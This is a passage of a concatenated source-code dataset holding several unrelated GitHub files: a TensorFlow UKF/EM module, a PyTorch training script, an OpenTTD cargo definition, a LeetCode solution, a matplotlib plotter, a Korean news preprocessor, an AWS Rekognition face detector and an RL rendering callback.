:, :]),\n P_smoothed[t-1, :, :]], axis=1)\n else:\n S1 = tf.concat([P_smoothed[t, :, :],\n pcross[t]], axis=1)\n S2 = tf.concat([pcross[t],\n P_smoothed[t-1, :, :]], axis=1)\n S_transition = tf.concat([S1, S2], axis=0)\n P_cross.append(tf.matmul(G[t-1, :, :],\n P_smoothed[t, :, :]))\n\n X, W = self.make_sigma_points(2 * self.m, mean_transition, S_transition)\n sig_points_transition.append([X, W])\n\n sig_points_measurement = []\n for t in range(0, a_smoothed.shape[0]):\n X, W = self.make_sigma_points(self.m, a_smoothed[t, :, :], P_smoothed[t, :, :])\n sig_points_measurement.append([X, W])\n\n return a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross\n\n def maximization_step(self, params_current, params_smooth=None, pcross=None):\n \n if params_smooth is None:\n a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross = self.expectation_step(params_current, pcross=pcross)\n _params = self.update_parameters(params_current)\n else:\n a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross = self.expectation_step(params_smooth, pcross=pcross)\n _params = self.update_parameters(params_smooth)\n\n H, Q, Z, T = _params\n\n m_dim = tf.cast(self.m, tf.int32)\n\n Sigma = 0\n Phi = 0\n Theta = 0\n B = 0\n C = 0\n D = 0\n\n H_star = 0\n\n for t in range(1, a_smoothed.shape[0]):\n X_m, W_m = sig_points_measurement[t-1]\n X_t, W_t = sig_points_transition[t-1]\n \n Sigma_t = P_smoothed[t, :, :] + tf.matmul(\n a_smoothed[t, :, :], a_smoothed[t, :, :], transpose_b=True) \n Sigma += Sigma_t\n\n Phi_t = tf.matmul(\n W_m * T(X_m, t, non_linear_only=True),\n T(X_m, t, non_linear_only=True),\n transpose_b=True\n ) \n Phi += Phi_t\n\n Theta_t = tf.matmul(\n W_m * Z(X_m, t, non_linear_only=True),\n Z(X_m, t, non_linear_only=True),\n transpose_b=True\n )\n Theta += Theta_t\n\n B_t = tf.matmul(\n W_m * self.y_ph[t, :, :],\n Z(X_m, t, non_linear_only=True),\n transpose_b=True\n )\n B += B_t\n\n C_t = tf.matmul(\n W_t * X_t[0:m_dim, :],\n T(X_t[m_dim:, :], t, non_linear_only=True),\n transpose_b=True\n )\n C += C_t\n\n D_t = tf.matmul(\n self.y_ph[t, :, :],\n self.y_ph[t, :, :],\n transpose_b=True\n )\n D += D_t\n\n if self.regression:\n Z_lin = params_current['Z_lin'][t]\n\n H_star += (\n D_t - tf.matmul(B_t, Z_lin, transpose_b=True) -\n tf.matmul(Z_lin, B_t, transpose_b=True) +\n tf.matmul(Z_lin, tf.matmul(Theta_t, Z_lin, transpose_b=True))\n )\n\n time_steps = a_smoothed.shape[0]\n\n Sigma = Sigma / time_steps\n Phi = Phi / time_steps\n Theta = Theta / time_steps\n B = B / time_steps\n C = C / time_steps\n D = D / time_steps\n\n Z_lin_star_r, T_lin_star_r = self.optimal_ZT(C, B, Phi, Theta)\n\n Q_star = (\n Sigma - tf.matmul(C, T_lin_star_r, transpose_b=True) -\n tf.matmul(T_lin_star_r, C, transpose_b=True) +\n tf.matmul(T_lin_star_r, tf.matmul(Phi, T_lin_star_r, transpose_b=True))\n )\n\n if self.regression:\n H_star = H_star / time_steps\n else:\n H_star = (\n D - tf.matmul(B, Z_lin_star_r, transpose_b=True) -\n tf.matmul(Z_lin_star_r, B, transpose_b=True) +\n tf.matmul(Z_lin_star_r, tf.matmul(Theta, Z_lin_star_r, transpose_b=True))\n )\n\n a_0_star = (\n a_smoothed[0, :, :]\n )\n self.a0 = a_0_star\n\n P0_star = (\n P_smoothed[0, :, :] + tf.matmul(\n a_smoothed[0, :, :] - self.a0,\n a_smoothed[0, :, :] - self.a0,\n transpose_b=True\n )\n )\n\n P0_current = deepcopy(self.P0)\n self.P0 = P0_star\n \n params_new = deepcopy(params_current)\n\n H_star_r, Q_star_r = self.optimal_HQ(H_star, Q_star)\n \n params_new['Q'] = Q_star_r\n params_new['H'] = H_star_r\n if not self.regression:\n params_new['Z_lin'] = Z_lin_star_r\n params_new['T_lin'] = T_lin_star_r\n\n obj = self.em_objective(time_steps, params_new, H_star, Q_star, P0_star)\n obj_pre = self.em_objective_pre(time_steps, params_current, H_star, Q_star, P0_current)\n\n self.params_record = params_new\n\n return obj, obj_pre, params_new\n\n def em_objective_pre(self, time_steps, params_current, H_star, Q_star, P0_current):\n pass\n\n\n def em_objective(self, time_steps, params_new, H_star, Q_star, P0_star):\n\n # Evaluate the objective function at the new optimal parameters\n\n ll_intial_conditions = - 0.5 * tf.linalg.logdet(self.P0)\n ll_intial_conditions += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(self.P0), P0_star\n )\n )\n\n ll_measurement = - 0.5 * tf.linalg.logdet(params_new['Q'])\n ll_measurement += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(params_new['Q']), Q_star\n )\n )\n ll_measurement = ll_measurement * time_steps\n\n ll_transition = - 0.5 * tf.linalg.logdet(params_new['H'])\n ll_transition += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(params_new['H']), H_star\n )\n )\n ll_transition = ll_transition * time_steps\n\n obj = -(ll_intial_conditions + ll_measurement + ll_transition)\n\n return obj\n\n def optimal_HQ(self, H, Q, args=None):\n\n # Optimal H, Q if restricted to diagonal.\n\n Q_diag = tf.diag(tf.linalg.diag_part(Q))\n H_diag = tf.diag(tf.linalg.diag_part(H))\n\n return H_diag, Q_diag\n\n def optimal_ZT(self, C, B, Phi, Theta, args=None):\n\n T_lin_star = tf.matmul(C, tf.linalg.inv(Phi))\n Z_lin_star = tf.matmul(B, tf.linalg.inv(Theta))\n\n return Z_lin_star, T_lin_star\n\n def get_objective_EM_numerical(self, params_current):\n\n a_smoothed, P_smoothed, sig_points_measurement, sig_points_transition, G, P_cross = self.expectation_step(params_current)\n\n def _objective_EM(params):\n\n _params = self.update_parameters(params)\n H, Q, Z, T = _params\n\n ll_intial_conditions = - 0.5 * tf.linalg.logdet(self.P0)\n ll_intial_conditions += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(self.P0),\n P_smoothed[0, :, :] + tf.matmul(\n a_smoothed[0, :, :] - self.a0,\n a_smoothed[0, :, :] - self.a0,\n transpose_b=True\n )\n )\n )\n\n ll_transition = 0\n ll_measurement = 0\n for t in range(1, a_smoothed.shape[0]):\n # Assume Q is not a function of state - evaluate at initial state.\n Qt = Q(self.a0, t)\n ll_transition += - 0.5 * tf.linalg.logdet(Qt)\n X, W = sig_points_transition[t-1]\n m_dim = tf.cast(self.m, tf.int32)\n cov_transition = tf.matmul(\n (X[0:m_dim, :] - T(X[m_dim:, :], t)) * W,\n (X[0:m_dim, :] - T(X[m_dim:, :], t)),\n transpose_b=True\n )\n ll_transition += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(Qt),\n cov_transition\n )\n )\n\n # Assume H is not a function of state - evaluate at initial state.\n Ht = H(self.a0, t)\n ll_measurement += - 0.5 * tf.linalg.logdet(Ht)\n X, W = sig_points_measurement[t-1]\n cov_measurement = tf.matmul(\n (self.y_ph[t, :, :] - Z(X, t)) * W,\n (self.y_ph[t, :, :] - Z(X, t)),\n transpose_b=True \n )\n \n ll_transition += - 0.5 * tf.trace(\n tf.matmul(\n tf.linalg.inv(Ht),\n cov_measurement\n )\n )\n\n\n total_objective = - (\n ll_intial_conditions +\n ll_transition +\n ll_measurement\n )\n\n return total_objective\n\n return _objective_EM\n\n","repo_name":"ChristophAy/tensorflow_probability_ukf","sub_path":"ukfssm.py","file_name":"ukfssm.py","file_ext":"py","file_size_in_byte":19987,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18627957272","text":"from arm_pytorch_utilities.rand import seed\nfrom datetime import datetime\nimport signal\nimport sys\nimport shutil\nimport argparse\nfrom src.training import MyDatasetBuilder, Trainer\nfrom src.utils import EncDataset\nfrom torch.utils.data import DataLoader, RandomSampler\nfrom torch.utils.tensorboard import SummaryWriter\nfrom functools import partial\nimport os\n\n\ndef sigint_handler(model_name, model_trainer, signal, frame):\n print('Early exit from trainer, attempting to save current model {0} ...'.format(model_name))\n model_trainer.save()\n sys.exit(0)\n\n\ndef main(args):\n # Attempt to create an EncDataset object with the passed folder name\n enc_dataset = EncDataset(args.folder)\n\n # Retrieve name of simple model\n simp_model = enc_dataset.get_simp_model()\n\n # Retrieve number of stacked together frames we want to train this model for\n nframes = enc_dataset.get_nframe()\n\n # Retrieve python enc config object\n config = enc_dataset.get_enc_cfg()\n\n current_time = datetime.now().strftime('%b%d_%H-%M-%S')\n model_name = \"model_{0}_enc_{1}frame_{2}\".format(simp_model, nframes, current_time)\n # Create a directory for storing model hparams/config\n model_dir_path = \"models/encoder/{0}\".format(model_name)\n # Copy config file used for creating model to model-dir\n os.makedirs(model_dir_path, exist_ok=True)\n shutil.copyfile('src/config/cartpole_config.py', '{0}/config.py'.format(model_dir_path))\n\n print('Training Model: {}'.format(model_name))\n # set seed\n seed(randseed=config.seed)\n mywriter = None\n # Use TensorBoardX object to log\n if args.log:\n mywriter = SummaryWriter(flush_secs=20, log_dir='runs/encoder/{0}'.format(model_name))\n device = config.device\n\n print('Making dataloader ...')\n\n dataset_builder = MyDatasetBuilder(config=config, excluded_augs=args.excluded_augs)\n\n train_dataset = dataset_builder.get_dataset(dataset_type='train')\n train_sampler = RandomSampler(train_dataset)\n train_loader = DataLoader(train_dataset, sampler=train_sampler, batch_size=config.batch_size,\n num_workers=config.num_workers, drop_last=True)\n\n test_dataset = dataset_builder.get_dataset(dataset_type='test')\n test_sampler = RandomSampler(test_dataset)\n test_loader = DataLoader(test_dataset, sampler=test_sampler, batch_size=config.batch_size,\n num_workers=config.num_workers, drop_last=True)\n\n trainer = Trainer(model_name, config, mywriter)\n # SIGINT handler for early exit to traning, pycharm complains incorrectly\n signal.signal(signal.SIGINT, partial(sigint_handler, model_name, trainer))\n # Train Model\n trainer.model.train()\n\n print(\"Training...\")\n trainer.run(train_loader, test_loader)\n test_loss = trainer.test(train_loader)\n print(\"Final train loss: {}\".format(test_loss))\n\n # Prints final test loss\n test_loss = trainer.test(test_loader)\n print(\"Test loss: {}\".format(test_loss))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n # dcartpole = double-cartpole, dubins = dubins car\n parser.add_argument(\"--folder\",\n action='store',\n type=str,\n help=\"Name of the folder from which to take train data, \"\n \"should follow format of EncFolder even if not saving generated frames to disk\",\n metavar=\"folder\")\n\n parser.add_argument(\"--log\",\n action='store_true',\n help=\"log traning session with TensorBoard\",\n dest=\"log\")\n\n parser.add_argument(\"--augs\",\n action='store',\n nargs='*',\n choices=[\"no_fg_texture\", \"no_bg_simp_model\", \"no_bg_shape\", \"no_bg_imgnet\", \"no_noise\"],\n type=str,\n help=\"Kinds of augmentations to be excluded from training: \"\n \"fg_texture=Apply random FG textures\"\n \"bg_simp_model=Have other simple models in background as distractors\"\n \"bg_shape: Have simulator-esque random regular polygon shapes in the bg\"\n \"bg_imgnet: Randomize the background with images from the imgnet dataset\",\n dest=\"excluded_augs\",\n metavar=\"excluded_augs\")\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"ishank-juneja/Online-Model-Selection","sub_path":"src/training/train_encoder.py","file_name":"train_encoder.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70947165492","text":"from cargo import Cargo\n\ncargo = Cargo(id='edible_oil',\n type_name='string(STR_CARGO_NAME_EDIBLE_OIL)',\n unit_name='string(STR_CARGO_NAME_EDIBLE_OIL)',\n type_abbreviation='string(STR_CID_EDIBLE_OIL)',\n sprite='NEW_CARGO_SPRITE',\n weight='1.0',\n cargo_payment_list_colour='162',\n is_freight='1',\n cargo_classes='bitmask(CC_PIECE_GOODS, CC_LIQUID)',\n cargo_label='EOIL',\n town_growth_effect='TOWNGROWTH_NONE',\n town_growth_multiplier='1.0',\n units_of_cargo='82',\n items_of_cargo='string(STR_CARGO_UNIT_EDIBLE_OIL)',\n penalty_lowerbound='20',\n single_penalty_length='128',\n price_factor='122',\n capacity_multiplier='1',\n icon_indices=(0, 3))\n","repo_name":"EmperorJake/XIS","sub_path":"src/cargos/edible_oil.py","file_name":"edible_oil.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"18406306569","text":"import itertools; import math; import operator; import random; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce; from heapq import *; import unittest; from typing import List; import functools\ndef get_sol(): return Solution()\nclass Solution:\n # https://leetcode.com/problems/cherry-pickup/discuss/329945/Very-easy-to-follow-%3A-step-by-step-recursive-backtracking-with-memoization-N4.\n def cherryPickup(self, grid: List[List[int]]) -> int:\n @functools.lru_cache(None)\n def dfs(r1,c1,r2,c2): # two person collecting at the same time\n if r1>=n or r2>=n or c1>=n or c2>=n: return float('-inf')\n if grid[r1][c1]==-1: return float('-inf')\n if grid[r2][c2]==-1: return float('-inf')\n if r1==n-1 and c1==n-1:\n return grid[r1][c1]\n if r2==n-1 and c2==n-1:\n return grid[r2][c2]\n\n if r1==r2 and c1==c2: # two persons standing at the same place. only one person will collect if any.\n ans=grid[r1][c1]\n else:\n ans=grid[r1][c1]+grid[r2][c2]\n\n tmp = max(dfs(r1+1,c1,r2+1,c2),\n dfs(r1+1,c1,r2,c2+1),\n dfs(r1,c1+1,r2+1,c2),\n dfs(r1,c1+1,r2,c2+1)\n )\n return ans+tmp\n\n n=len(grid)\n res= dfs(0,0,0,0)\n return res if res!=float('-inf') else 0\nclass Solution2:\n # wrong\n def cherryPickup(self, grid: List[List[int]]) -> int:\n def dfs(i, j, end_i, end_j, dirs):\n if not 0<=ians:\n ans=tmp\n path=tmp_path\n return [grid[i][j]+ans,[(i,j)]+path]\n\n n=len(grid)\n dirs_go,dirs_comeback=[(1,0),(0,1)],[(-1,0),(0,-1)]\n go,path= dfs(0, 0, n - 1, n - 1, dirs_go)\n for i,j in path:\n grid[i][j]=0\n comeback,_= dfs(n - 1, n - 1, 0, 0, dirs_comeback)\n res=go+comeback\n return res if res!=float('-inf') else 0\n\nclass MyTestCase(unittest.TestCase):\n def test1(self):\n Output= 5\n self.assertEqual(Output, get_sol().cherryPickup(grid = [[0,1,-1],[1,0,-1],[1,1,1]]))\n def test2(self):\n Output= 0\n self.assertEqual(Output, get_sol().cherryPickup(grid = [[1,1,-1],[1,-1,1],[-1,1,1]]))\n def test3(self):\n grid = [[1,1,0,1],\n [0,0,0,0],\n [0,0,0,0],\n [1,0,1,1]]\n Output= 6\n self.assertEqual(Output, get_sol().cherryPickup(grid))\n def test4(self):\n grid=[[1,1,1,0,1],\n [0,0,0,0,0],\n [0,0,0,0,0],\n [0,0,0,0,0],\n [1,0,1,1,1]]\n Output= 8\n self.assertEqual(Output, get_sol().cherryPickup(grid))\n def test5(self):\n Output= 15\n self.assertEqual(Output, get_sol().cherryPickup(grid = [[1,1,1,1,0,0,0],[0,0,0,1,0,0,0],[0,0,0,1,0,0,1],[1,0,0,1,0,0,0],[0,0,0,1,0,0,0],[0,0,0,1,0,0,0],[0,0,0,1,1,1,1]]))\n # def test5(self):\n # def test6(self):\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc741.py","file_name":"lc741.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18086422444","text":"import matplotlib.pyplot as plt\n\n\n#runs through file and returns list of ones in each slot\ndef getnumberofOnes(cyclelength,numberofslots,filename):\n f=open(filename,'r')\n y = f.read()\n counter=0\n listforplot =[]\n perslot =cyclelength*36000/numberofslots\n for p in xrange(0,numberofslots):\n counter=0\n for x in y[p*perslot:(p+1)*perslot]:\n if x == \"1\":\n counter=counter+1\n listforplot.append(counter)\n return(listforplot)\n#plots timeline based on iputs\ndef plot(cyclelength,numberofslots,listofgroup):\n slotlist=[]\n fig, ax = plt.subplots()\n plt.subplots_adjust(bottom=.73, left=.08, right=.95, top=.99, hspace=.35,wspace=0)\n z=len(listofgroup)\n colorlist = ['b', 'g', 'r', 'c', 'm', 'y', 'k']\n listofgroup.reverse()\n newlist =[]\n for x in xrange(0,z):\n newlist.append(x*2.5)\n a =getnumberofOnes(cyclelength,numberofslots,str(x+1)+\".soundclout\")\n for y in xrange(0,numberofslots):\n slotlist.append(y)\n if a[y]!=0:\n ax.broken_barh([(slotlist[y], 1)],(2.5*x,2.5), facecolors='blue')\n ax.set_ylim(0 ,2.5*len(newlist))\n ax.set_xlim(0, numberofslots)\n ax.set_xlabel('slots')\n ax.set_ylabel('Groups')\n ax.set_yticks(newlist)\n ax.set_yticklabels(listofgroup)\n plt.savefig('timeline.png',bbox_inches='tight',frameon=False)\n #plt.show()\n#z= ['group1','group2','group3']\n#plot(10,z)\n","repo_name":"SCCapstone/SoundClout","sub_path":"kivy/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32242897223","text":"from bs4 import BeautifulSoup\r\nfrom bs4.element import NavigableString, Tag\r\nfrom koalanlp.Util import initialize, finalize\r\nfrom koalanlp import API\r\nfrom koalanlp.proc import SentenceSplitter, Tagger\r\nfrom textrankr import TextRank\r\n\r\nimport hanja\r\nimport sys\r\nimport os\r\nimport re\r\n\r\ndef process(target):\r\n \r\n # remove bylines\r\n target = re.sub(r'\\. *\\S+ +\\S+ +\\w+@(\\w+\\.)+\\w+', '.', target)\r\n target = re.sub(r'\\S+ +\\S+ +\\w+@(\\w+\\.)+\\w+', '.', target)\r\n\r\n # remove parentheses\r\n target = re.sub(r'\\([^)]+\\)', ' ', target)\r\n target = re.sub(r'\\[[^)]+\\]', ' ', target)\r\n target = re.sub(r'\\<[^)]+\\>', ' ', target)\r\n target = re.sub(r'\\【[^)]+\\】', ' ', target)\r\n\r\n # replace hanja to hangul\r\n hanja.translate(target, 'substitution')\r\n\r\n # remove special characters except necessary punctuations\r\n target = re.sub(r'[^A-Za-zㄱ-ㅎㅏ-ㅣ가-힣0-9\\%\\-\\_\\.\\,\\?\\!\\/\\\"\\'ㆍ·。、“”‘’『』《》〈〉「」\\~○×□…\\ ]', ' ', target)\r\n\r\n # initialize korean language analyzers\r\n splitter = SentenceSplitter(API.HNN)\r\n tagger = Tagger(API.KHAIII, kha_resource=\"/usr/local/share/khaiii\")\r\n\r\n # split text into sentences\r\n sentences = splitter(target) \r\n\r\n # regularize sentences (ex: 해서->하여서)\r\n target_regularized = ''\r\n for sent in sentences:\r\n sent = tagger.tagSentence(sent)\r\n sent_regularized = []\r\n for word in sent[0].words:\r\n word_regularized = ''\r\n for m in word.morphemes:\r\n if m.tag.startswith('J'): # if 조사\r\n word_regularized += ' ' # add space\r\n word_regularized += m.surface\r\n sent_regularized.append(word_regularized)\r\n target_regularized += '\\n' + ' '.join(sent_regularized)\r\n \r\n # regularize whitespaces\r\n target_regularized = re.sub(r' +', ' ', target_regularized)\r\n\r\n return target_regularized\r\n\r\nif len(sys.argv) != 3:\r\n print(\"Usage: python preprocessor.py \")\r\n sys.exit()\r\n\r\ninitialize(KHAIII='LATEST', HNN='LATEST')\r\n\r\nload_path = sys.argv[1]\r\nsave_path = sys.argv[2]\r\n\r\nfiles = [f for f in os.listdir(load_path) if os.path.isfile(os.path.join(load_path, f)) and f.endswith(\"story\")]\r\nfor fi in files:\r\n print('id: {}'.format(fi))\r\n with open(os.path.join(load_path, fi), 'r', encoding='utf-8') as f:\r\n # get title\r\n assert \"@title\\n\" == f.readline()\r\n\r\n title = \"\"\r\n content = \"\"\r\n\r\n line = f.readline()\r\n while line != '@content\\n':\r\n title += line\r\n line = f.readline()\r\n content = f.read()\r\n\r\n # specify skip target article titles (e.g. photo only articles)\r\n if any(x in title for x in ['포토','사진', '경향이 찍은 오늘']):\r\n print(\"skipped\")\r\n continue\r\n\r\n # initialize html parser\r\n bs = BeautifulSoup(content, 'html.parser')\r\n \r\n # remove html tag\r\n content = ''\r\n summary = ''\r\n for elem in bs.children: # get article body\r\n if type(elem) is Tag: # html tag\r\n if elem.name == 'br':\r\n content += '\\n'\r\n elif elem.name == 'p':\r\n content += elem.text + '\\n'\r\n else:\r\n content += elem.text\r\n elif type(elem) is NavigableString: # plain text\r\n content += elem\r\n \r\n # get summary (the first paragraph of a article)\r\n flag_paragraph_change = False\r\n for sent in content.split('\\n'):\r\n if len(sent.strip()) == 0: # newline\r\n flag_paragraph_change = True # if previous sentence is newline\r\n if not len(summary):\r\n continue\r\n else:\r\n break\r\n \r\n flag_paragraph_change = False\r\n if sent.strip().endswith('.'): # only if the sentence ends with '.' (full sentence)\r\n summary += sent\r\n\r\n # process text\r\n content = process(content)\r\n \r\n textrank = TextRank(content)\r\n summary = textrank.summarize()\r\n\r\n print(summary)\r\n\r\n # save processed files\r\n if not os.path.exists(save_path):\r\n os.mkdir(save_path)\r\n with open(os.path.join(save_path, fi), 'w', encoding='utf-8') as f:\r\n f.write(\"@title\\n\")\r\n f.write(title.strip() + \"\\n\")\r\n f.write(\"@summary\\n\")\r\n f.write(summary.strip() + \"\\n\")\r\n f.write(\"@content\\n\")\r\n f.write(content.strip() + \"\\n\")\r\n\r\nfinalize()","repo_name":"junbread/news-crawler","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37743944449","text":"import sys\nimport json\nimport asyncio\nimport aioboto3\nimport time\n\nwith open(\"src/aws.json\", \"r\") as f:\n AWS_PROFILES = json.load(f)\n\ndef get_image_from_file(filename):\n with open(filename, \"rb\") as f:\n image_bytes= f.read()\n\n return image_bytes\n\nclass FaceDetector:\n \"\"\"\n 顔認証クラス\n\n 利用方法\n await FaceDetector().detect(image_files)\n \"\"\" \n def __init__(self):\n self.result = []\n\n async def __single(self, image_file, client):\n filename = image_file\n result = await client.detect_faces(\n Image={\n 'Bytes': get_image_from_file(image_file),\n },\n Attributes=[\n 'ALL',\n ]\n )\n\n self.result.append({\"filename\":filename, \"result\":result})\n print(\"finished: \" + filename)\n #print(len(result['FaceDetails']))\n\n async def detect(self, image_files):\n \"\"\"\n 顔認証メソッド\n\n :param list image_files ファイル名のリスト\n \"\"\"\n async with aioboto3.client('rekognition',\n region_name=AWS_PROFILES['AWS_DEFAULT_REGION'],\n aws_access_key_id=AWS_PROFILES['AWS_ACCESS_KEY_ID'],\n aws_secret_access_key=AWS_PROFILES['AWS_SECRET_ACCESS_KEY'],\n ) as client:\n await asyncio.gather(*[self.__single(image_file, client) for image_file in image_files])\n\n def get_result(self):\n return self.result\n\nasync def main(image_files):\n detectfaces = FaceDetector()\n\n start = time.time()\n await detectfaces.detect(image_files)\n elapsed = time.time() - start\n\n print(f\"{elapsed * 1000:.0f}ms\") # ミリ秒\n print(detectfaces.get_result())\n\nif __name__ == '__main__':\n asyncio.run(main(sys.argv[1:]))\n","repo_name":"t-morisawa/rekognition","sub_path":"src/rekognition.py","file_name":"rekognition.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41799127696","text":"import logging\nimport time\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, Union\n\nimport numpy as np\n\nfrom srl.base.define import EnvObservationTypes, PlayRenderModes\nfrom srl.base.rl.worker_run import WorkerRun\nfrom srl.runner.callback import Callback\nfrom srl.runner.runner import Runner\nfrom srl.utils.render_functions import text_to_rgb_array\n\nlogger = logging.getLogger(__name__)\n\nif TYPE_CHECKING:\n from matplotlib.animation import ArtistAnimation\n\n\n@dataclass\nclass Rendering(Callback):\n mode: Union[str, PlayRenderModes] = PlayRenderModes.none\n kwargs: dict = field(default_factory=lambda: {})\n step_stop: bool = False\n render_skip_step: bool = True\n\n # render option\n render_interval: float = -1 # ms\n render_scale: float = 1.0\n font_name: str = \"\"\n font_size: int = 12\n\n def __post_init__(self):\n self.frames = []\n self.info_maxw = 0\n self.info_maxh = 0\n self.env_maxw = 0\n self.env_maxh = 0\n self.rl_maxw = 0\n self.rl_maxh = 0\n self.rl_state_maxw = 0\n self.rl_state_maxh = 0\n\n self.info_text = \"\"\n self.env_img = None\n self.rl_text = \"\"\n self.rl_img = None\n self.rl_state_image = None\n self.font = None\n\n self.mode = PlayRenderModes.from_str(self.mode)\n\n def on_episodes_begin(self, runner: Runner) -> None:\n assert runner.state.env is not None\n self.render_interval = runner.state.env.set_render_options(\n self.render_interval,\n self.render_scale,\n self.font_name,\n self.font_size,\n )\n\n def on_step_action_before(self, runner: Runner) -> None:\n self._render_env(runner)\n\n def on_step_begin(self, runner: Runner) -> None:\n self._render_worker(runner)\n self._add_image()\n\n if self.step_stop:\n input(\"Enter to continue:\")\n\n def on_skip_step(self, runner: Runner):\n if not self.render_skip_step:\n return\n self._render_env(runner, True)\n self._add_image()\n\n def on_episode_end(self, runner: Runner) -> None:\n self._render_env(runner)\n self._add_image()\n\n def on_episodes_end(self, runner: Runner) -> None:\n if self.step_stop:\n input(\"Enter to continue:\")\n\n # -----------------------------------------------\n\n def _render_env(self, runner: Runner, skip_step=False):\n env = runner.state.env\n assert env is not None\n\n # --- info text\n action = runner.state.action\n worker_idx = runner.state.worker_idx\n worker: WorkerRun = runner.state.workers[worker_idx]\n info_text = f\"### {env.step_num}\"\n if isinstance(action, float):\n a1 = f\"{action:.3f}\"\n else:\n a1 = f\"{action}\"\n a2 = env.action_to_str(action)\n if a1 != a2:\n action = f\"{a1}({a2})\"\n info_text += f\", action {action}\"\n info_text += \", rewards[\" + \",\".join([f\"{r:.3f}\" for r in env.step_rewards]) + \"]\"\n if env.done:\n info_text += f\", done({env.done_reason})\"\n if env.player_num > 1:\n info_text += f\", next {env.next_player_index}\"\n if skip_step:\n info_text += \"(skip frame)\"\n info_text += f\"\\nenv {env.info}\"\n info_text += f\"\\nwork{worker_idx: <2d}{worker.info}\"\n self.info_text = info_text\n\n # --- render_terminal\n if self.mode == PlayRenderModes.terminal:\n print(info_text)\n\n # --- env text\n env.render_terminal(**self.kwargs)\n\n # --- render window\n if self.mode == PlayRenderModes.window:\n env.render_window(**self.kwargs)\n\n if self.mode == PlayRenderModes.rgb_array:\n self.env_img = env.render_rgb_array(**self.kwargs)\n self.env_maxw = max(self.env_maxw, self.env_img.shape[1])\n self.env_maxh = max(self.env_maxh, self.env_img.shape[0])\n\n def _add_image(self):\n # --- rgb\n if self.mode == PlayRenderModes.rgb_array:\n info_img = text_to_rgb_array(self.info_text)\n self.info_maxw = max(self.info_maxw, info_img.shape[1])\n self.info_maxh = max(self.info_maxh, info_img.shape[0])\n\n self.frames.append(\n {\n \"info_image\": info_img,\n \"env_image\": self.env_img,\n \"rl_image\": self.rl_img,\n \"rl_state_image\": self.rl_state_image,\n }\n )\n\n def _render_worker(self, runner: Runner):\n worker = runner.state.workers[runner.state.worker_idx]\n\n # --- render_terminal\n if self.mode == PlayRenderModes.terminal:\n worker.render_terminal(**self.kwargs)\n\n # --- rgb\n if self.mode == PlayRenderModes.rgb_array:\n self.rl_img = worker.render_rgb_array(**self.kwargs)\n self.rl_maxw = max(self.rl_maxw, self.rl_img.shape[1])\n self.rl_maxh = max(self.rl_maxh, self.rl_img.shape[0])\n\n # rlへの入力画像\n if EnvObservationTypes.is_image(worker.config.env_observation_type):\n # COLOR画像に変換\n _img = worker.state.copy()\n if _img.max() <= 1:\n _img *= 255\n if worker.config.env_observation_type == EnvObservationTypes.GRAY_2ch:\n _img = _img[..., np.newaxis]\n _img = np.tile(_img, (1, 1, 3))\n elif worker.config.env_observation_type == EnvObservationTypes.GRAY_3ch:\n _img = np.tile(_img, (1, 1, 3))\n self.rl_state_image = _img.astype(np.uint8)\n self.rl_state_maxw = max(self.rl_state_maxw, self.rl_state_image.shape[1])\n self.rl_state_maxh = max(self.rl_state_maxh, self.rl_state_image.shape[0])\n\n # -----------------------------------------------\n def _create_image(self, frame):\n import cv2\n\n info_image = frame[\"info_image\"]\n env_image = frame[\"env_image\"]\n rl_image = frame[\"rl_image\"]\n rl_state_image = frame[\"rl_state_image\"]\n\n # --- 余白を追加\n padding = 2\n info_image = cv2.copyMakeBorder(\n info_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(0, 0, 0)\n )\n if rl_image is not None:\n rl_image = cv2.copyMakeBorder(\n rl_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(0, 0, 0)\n )\n env_image = cv2.copyMakeBorder(\n env_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(255, 255, 255)\n )\n if rl_state_image is not None:\n rl_state_image = cv2.copyMakeBorder(\n rl_state_image, padding, padding, padding, padding, cv2.BORDER_CONSTANT, value=(255, 255, 255)\n )\n\n # --- info + rl_image: 余白は右を埋める\n if rl_image is None:\n right_img = info_image\n right_maxh = self.info_maxh + padding * 2\n else:\n maxw = max(self.info_maxw + padding * 2, self.rl_maxw + padding * 2)\n info_w = maxw - info_image.shape[1]\n rl_w = maxw - rl_image.shape[1]\n info_image = cv2.copyMakeBorder(info_image, 0, 0, 0, info_w, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n rl_image = cv2.copyMakeBorder(rl_image, 0, 0, 0, rl_w, cv2.BORDER_CONSTANT, value=(0, 0, 0))\n right_img = cv2.vconcat([info_image, rl_image]) # 縦連結 # type: ignore , 